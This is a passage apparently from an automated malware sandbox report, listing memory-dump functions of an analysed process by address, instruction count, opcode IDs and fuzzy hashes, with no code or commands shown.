                                                  • Instruction Fuzzy Hash: 0941603260C9588FDF98EF28D4A6DA473E1FB69334B0401AED05FC7692DE25E845CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEE760 Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8dd612f02feabc82f00f74e4cdfb7cc1e315326ae3f0bfd10140b50dfb228ef0
                                                  • Instruction ID: 45b650d6936a7ad5c3eead358903cb67e6239cdc1ae8ad0649993e8b143c8982
                                                  • Opcode Fuzzy Hash: 8dd612f02feabc82f00f74e4cdfb7cc1e315326ae3f0bfd10140b50dfb228ef0
                                                  • Instruction Fuzzy Hash: 0C41F630A1D95E8FEBF8DB5884616B877A1FF54300F1585BAC04EC71A6DD78AA85CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE8391 Relevance: .1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0c41cf3fa14aca11d66fb028d8d307c75f2dd906d177c3c61b90f6ade16a073
                                                  • Instruction ID: 4e00fd5cee4ae7dbc63fe72127efe58610e35f050818946449f948fd433b7bf7
                                                  • Opcode Fuzzy Hash: f0c41cf3fa14aca11d66fb028d8d307c75f2dd906d177c3c61b90f6ade16a073
                                                  • Instruction Fuzzy Hash: F131C471E0A90E8FDBB8EF5898616FCB3A1FF58310F5102BAD05DD7195DEB46A818B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB0AAD Relevance: .1, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 129f5f3db0e897c267ceb9ef2a714642bbef4838c4c8eb74bf725f8a1667dcde
                                                  • Instruction ID: adb27c9bbbe0b606dfaef9de84889d4d1f2b1a23b8add0e00f3f1d1da5621692
                                                  • Opcode Fuzzy Hash: 129f5f3db0e897c267ceb9ef2a714642bbef4838c4c8eb74bf725f8a1667dcde
                                                  • Instruction Fuzzy Hash: 8C41EB21A0F3DA5FE72A467558344A87F95AF43734B0A11FBD0898B0E3D9081946C7EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB9211 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7a8c1210a3ae0c8214d85f6606bcfda1578de2bad4a92fa129ba372315da647
                                                  • Instruction ID: 69d6980c22b2a7340f9107e459f13df722507c99cd7c1f2f045f8979ac5bf0b4
                                                  • Opcode Fuzzy Hash: f7a8c1210a3ae0c8214d85f6606bcfda1578de2bad4a92fa129ba372315da647
                                                  • Instruction Fuzzy Hash: 60315F3260C9588FDB98EF28C4A5DA477E1FB69324B0402AED45FC7592DE25E845CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD1DA3 Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a20572929dcde9c4d4060660d7dbe9d74c267c6c955bfc58a9f6bdf563f8d19e
                                                  • Instruction ID: 60b3e5ffe2b4b364b93ee0dfee44bd0524e5d1f04c7ffee7d0c496d9d26fd50c
                                                  • Opcode Fuzzy Hash: a20572929dcde9c4d4060660d7dbe9d74c267c6c955bfc58a9f6bdf563f8d19e
                                                  • Instruction Fuzzy Hash: 10315B30B18A498BDB4CDF4888A55BA73E2FFD8715B14463EE45EC3295CE30E8128B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF4920 Relevance: .1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e3d75dc842c6de873356b4ae886c7f5370ddc0d8b6f2f4bfd06bdea9da3f358f
                                                  • Instruction ID: daa6f2b0e4d41e0acf905e0e0bd7a68a0bb4b0813a857411deebe7e41bec19fd
                                                  • Opcode Fuzzy Hash: e3d75dc842c6de873356b4ae886c7f5370ddc0d8b6f2f4bfd06bdea9da3f358f
                                                  • Instruction Fuzzy Hash: AC31623260CA498FDFA9EF28C4A5DA4B7E1FB69314B05026DD44ED75A2DE24F884CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB91AB Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8ca8b1d619c9b59fccb07342df30923fd173466db745770fa7a5756feb673b9
                                                  • Instruction ID: 30242c7761ca3e721943cdb7316ebf75fe110992bf0a5240b7c2d048eca8d6ee
                                                  • Opcode Fuzzy Hash: c8ca8b1d619c9b59fccb07342df30923fd173466db745770fa7a5756feb673b9
                                                  • Instruction Fuzzy Hash: 7F31613260C9598FDB98EF28C4A5EA473E1FF69324B0501ADD05FC7692DE25E845CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAECBC9 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 906970d6805ddd10b4923b7ccda4a9c04c9afe05536509159c9659c1081c5c7a
                                                  • Instruction ID: 821f6cc445f38d0db90a3f3c1b5827406d0ffa499cc3539ca2a056e8de2a757a
                                                  • Opcode Fuzzy Hash: 906970d6805ddd10b4923b7ccda4a9c04c9afe05536509159c9659c1081c5c7a
                                                  • Instruction Fuzzy Hash: B4319031B1E95E8FE778979C94295BD77E0EFC8350B160176E00EC71A1EEAC6E409781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC154 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bec4721e0d7f4af7338d69f361859d453f81e906743633db4d4bb9a505f395d
                                                  • Instruction ID: 794611e1b5d3a2028dc30aa54d2efd9fdaf51f98cea00e1981ea35d0a6246538
                                                  • Opcode Fuzzy Hash: 1bec4721e0d7f4af7338d69f361859d453f81e906743633db4d4bb9a505f395d
                                                  • Instruction Fuzzy Hash: 59311B70F1991D8FEBA4EBD8D4A5AECB7B5FF98300F91023AD04DD3291DE6869418B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE860A Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34705cd94ce783a7b7e823086ffb3b31044c8cbd3723cf31feb5f78d5c8f2409
                                                  • Instruction ID: 095050a742d6b701909f4e677c0836c934c1d53e5fd9dee6fa735fefaf57adde
                                                  • Opcode Fuzzy Hash: 34705cd94ce783a7b7e823086ffb3b31044c8cbd3723cf31feb5f78d5c8f2409
                                                  • Instruction Fuzzy Hash: E2313075E0AA1E8EEFB4DB8898557E973B0FF24320F0101BAD45DD3191DF746A868B81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB0C09 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6115385aeba8dbd35613fd20cda820398f08e035fa6bfb14fc3aa09281072328
                                                  • Instruction ID: 9309ed4f9b93179e955669ea286ae601beedf7620a9c175e8a07df3a4a25e471
                                                  • Opcode Fuzzy Hash: 6115385aeba8dbd35613fd20cda820398f08e035fa6bfb14fc3aa09281072328
                                                  • Instruction Fuzzy Hash: 6831A639B1E92D8FE778869A94255BD77A0FF48B20F261177E00FD71A1DF1869005BC1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEB069 Relevance: .1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c19a7b4541be6adf3b17d85ea3b91c90b8f01e82f888bb2ff4d329f551a1b49a
                                                  • Instruction ID: eac9bd2d76ee35c86db0015067ae7e84366fdc1dda222902840293de1abb2c32
                                                  • Opcode Fuzzy Hash: c19a7b4541be6adf3b17d85ea3b91c90b8f01e82f888bb2ff4d329f551a1b49a
                                                  • Instruction Fuzzy Hash: AC31E421A0F58E4BF73957D898B95B83750EF42320F9605BAE54F8B0E3DD88264153A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF2059 Relevance: .1, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d5e5a75b1d83f1ecb62b96c6bc1d16784b105188eed4283825895305b710a36
                                                  • Instruction ID: 7bc6a50445a6659d3642c50fa81db5de14aa21d35ce9c36eaad0e7b8ea56ca49
                                                  • Opcode Fuzzy Hash: 4d5e5a75b1d83f1ecb62b96c6bc1d16784b105188eed4283825895305b710a36
                                                  • Instruction Fuzzy Hash: AC317022B1EB1E9FE7748BD89465DFD7EA1EF48300BA60076F00EC31A5DEA86D01D641
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBCBE0 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 945aac1ce16eb331f60d138cb58c32ab47d7c31081b312bead55f3a5daff0b04
                                                  • Instruction ID: 3f681e9dfccb13b657a61a086ea39244624ee1283b42074c04b484dfd9486607
                                                  • Opcode Fuzzy Hash: 945aac1ce16eb331f60d138cb58c32ab47d7c31081b312bead55f3a5daff0b04
                                                  • Instruction Fuzzy Hash: D931E375E0EA9D8FDB59CBA8C8605AC7BB1FF59310F0901BBD04AD71E3DA246901CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE9519 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e97f42053ad3100227d5b7f40e15c12b5e40fce0f27123394bae82c7a32f5231
                                                  • Instruction ID: f42d29e36711c759f60e63fe576d72dbf0f57274c2e3cfc54109c46508b225fb
                                                  • Opcode Fuzzy Hash: e97f42053ad3100227d5b7f40e15c12b5e40fce0f27123394bae82c7a32f5231
                                                  • Instruction Fuzzy Hash: C3310E70A0D61D8FDBA9EB58D4A5AFCB3B5EF59314F5001A8E00DA7291CE74AA81CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBEB69 Relevance: .1, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fffb0449bce887aaab006f95256b8540a638c7af99712f2d6231876fe0ade64
                                                  • Instruction ID: 890ebfc132cde407719f1be68c3c2ed3755fd9d7b17f658f42d1a4d0b65b366b
                                                  • Opcode Fuzzy Hash: 6fffb0449bce887aaab006f95256b8540a638c7af99712f2d6231876fe0ade64
                                                  • Instruction Fuzzy Hash: DE31B431F1E52D8FE7FC879884659BD77A1EF48320B562876E00FC31A1CE28AA009B45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEC78D Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e90ede0145ded7d929561c704f115fd56c310d29385f430cc7bcfa3e6d36251
                                                  • Instruction ID: 653c93f587df41b80748fd8564e2889c6daa9043e35d03c40990e00c266f64c5
                                                  • Opcode Fuzzy Hash: 8e90ede0145ded7d929561c704f115fd56c310d29385f430cc7bcfa3e6d36251
                                                  • Instruction Fuzzy Hash: DB316271B1990E9FDB58DB98D4A25BCB3A1FF94320B42423AD01ED3295DF787812CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF1C3B Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9faaeca9ada3e9500a232b90dd8350fc01218c84ee2d713c7493c186f067670a
                                                  • Instruction ID: 793dc2bbf620a134e99adaed8ef1d7b702f8dc0303df3c70dae42a3c6f44d5ef
                                                  • Opcode Fuzzy Hash: 9faaeca9ada3e9500a232b90dd8350fc01218c84ee2d713c7493c186f067670a
                                                  • Instruction Fuzzy Hash: 99316E71F19A0E8FDB58EB98D4A19B8B7A1FF98310B554139D01ED3291DF64BD12CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE5264 Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c5c1d22ded92545f397f8fd4546af6e125c7395a50cd9a0c4f93f9e43390b47d
                                                  • Instruction ID: d869c64fb1a3e1f358f14b1384d9f39c6b5a4552cc2044a74835baaf0055e7d5
                                                  • Opcode Fuzzy Hash: c5c1d22ded92545f397f8fd4546af6e125c7395a50cd9a0c4f93f9e43390b47d
                                                  • Instruction Fuzzy Hash: 6F310370E19A5D8FEF94EF98D899AACBBF1FF58300F400169D00DE7266DE7468818B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC84D Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf538d5c5a00551bd5f117d247fd7b4c2f766a869c55b2322f45e78ac1ab0c7a
                                                  • Instruction ID: 052083e87f9e0651a0ef58241503380e26f44c9c8855469aa3bb6e6d7853e78d
                                                  • Opcode Fuzzy Hash: bf538d5c5a00551bd5f117d247fd7b4c2f766a869c55b2322f45e78ac1ab0c7a
                                                  • Instruction Fuzzy Hash: 2D31F821B0D15B4BE725BBACA8259FC3760AF95339F450377E41DC90E3EE6C26408655
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE58B8 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: edc2feb7741297e79fec0199b37045c4bd3d0558c4509afb9e432135ba6fbfe8
                                                  • Instruction ID: e9c5805ef002aeb6ca2dfc807af99e8a7eb6fc450e48813f79e856874c9cd6d4
                                                  • Opcode Fuzzy Hash: edc2feb7741297e79fec0199b37045c4bd3d0558c4509afb9e432135ba6fbfe8
                                                  • Instruction Fuzzy Hash: 4B310770A0951E8FDBA4EF18D854BE977F0EF59315F0101BA950DE32A1DA74AA80CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB63A5 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 820160b180e329885a24bc9e159ea46140fbbc5116ed5b25bcec1ff7f238bded
                                                  • Instruction ID: aec4ea063714bc643e1653278d102919a8de61c80e95cea24778cd849ce7a9b6
                                                  • Opcode Fuzzy Hash: 820160b180e329885a24bc9e159ea46140fbbc5116ed5b25bcec1ff7f238bded
                                                  • Instruction Fuzzy Hash: A631D672F0EA5A4FEB6CDBA848721A8B7A1EF54320F451179D01FC72D2DD28A9018B91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE58D1 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 01ab2de95bdff1c675337436606ea31065a5fca656b812052514f02e8a05351e
                                                  • Instruction ID: ee0a61f68e90d11493c694372a43b51e79864124ddbdf9510fda3be52fce54e6
                                                  • Opcode Fuzzy Hash: 01ab2de95bdff1c675337436606ea31065a5fca656b812052514f02e8a05351e
                                                  • Instruction Fuzzy Hash: 56310870A0951E8FDBA4EF18D854BF977F4EF59314F0101BA940DE32A1DB74AA80CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB8F75 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 04fa77cdbc292ba1aa9d15ee70abbfa2fda999ffbd420ec44b9745142efa8f05
                                                  • Instruction ID: 3e6aa7d0e410029acaa3f8a05955b9c9af270dad7e192b9753528b022d056246
                                                  • Opcode Fuzzy Hash: 04fa77cdbc292ba1aa9d15ee70abbfa2fda999ffbd420ec44b9745142efa8f05
                                                  • Instruction Fuzzy Hash: 46314A30A1A5AE8FEBA8DB9488A55BD77B1FF48320F51117AD01FD31A1DB396A408B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBEA1B Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b9b500f66f76cb1ffdea67bff010acf1434e993933438cb0902d10029406c614
                                                  • Instruction ID: c94474d30693dd1fbb228bb3889d230be26fdcbba6c7dbfef9e9f55d675fd878
                                                  • Opcode Fuzzy Hash: b9b500f66f76cb1ffdea67bff010acf1434e993933438cb0902d10029406c614
                                                  • Instruction Fuzzy Hash: A6310721A4F7DE4BE7AA52B458640A43FD4EF46320F0E05FBE48ACB0A3D9081946C356
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC1CC Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9413a797dc2c79e7811a4c5c3f326f9cf65f4c9ad377ba9eeb5406565f5d6e51
                                                  • Instruction ID: 89471e0b2f696c4d6332a014e3d49831cc615754f4a81f9082d4ec128c44e4ba
                                                  • Opcode Fuzzy Hash: 9413a797dc2c79e7811a4c5c3f326f9cf65f4c9ad377ba9eeb5406565f5d6e51
                                                  • Instruction Fuzzy Hash: 9C210C70F0991D8FEBA4EBEC84656ADB7B5FF99300F91022AD04DD3292DE6869418B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE8B7A Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ef40c6352899fc03d88dc78e2300a1d7de5ad63703befc57b42177fa8272941
                                                  • Instruction ID: ebcb5d6fbaa9f964c6c15c654dc785220fce49a8969eee44cbca90ca22904705
                                                  • Opcode Fuzzy Hash: 6ef40c6352899fc03d88dc78e2300a1d7de5ad63703befc57b42177fa8272941
                                                  • Instruction Fuzzy Hash: 6F31B770A1961E8FDBA4EF58D854BE977F0EF59315F0101BA950DE32A1DB74AA80CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBA05F Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9c324b317d15bf151b60df231ef369f9fddbf9578f318bd1373c2e0457e7f90
                                                  • Instruction ID: 80d6331c8e27988795847ca730b873caae1b6e7b17d389fb186dda7204e55502
                                                  • Opcode Fuzzy Hash: f9c324b317d15bf151b60df231ef369f9fddbf9578f318bd1373c2e0457e7f90
                                                  • Instruction Fuzzy Hash: 25310C71E0890D8FDF88EBA8C495EED77F1EF59314B5101B9D01AD72A6DE38A841CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF2169 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2c43fbda522775f2df603599888a951daf71e1496ef11265cefe67d0caeb191
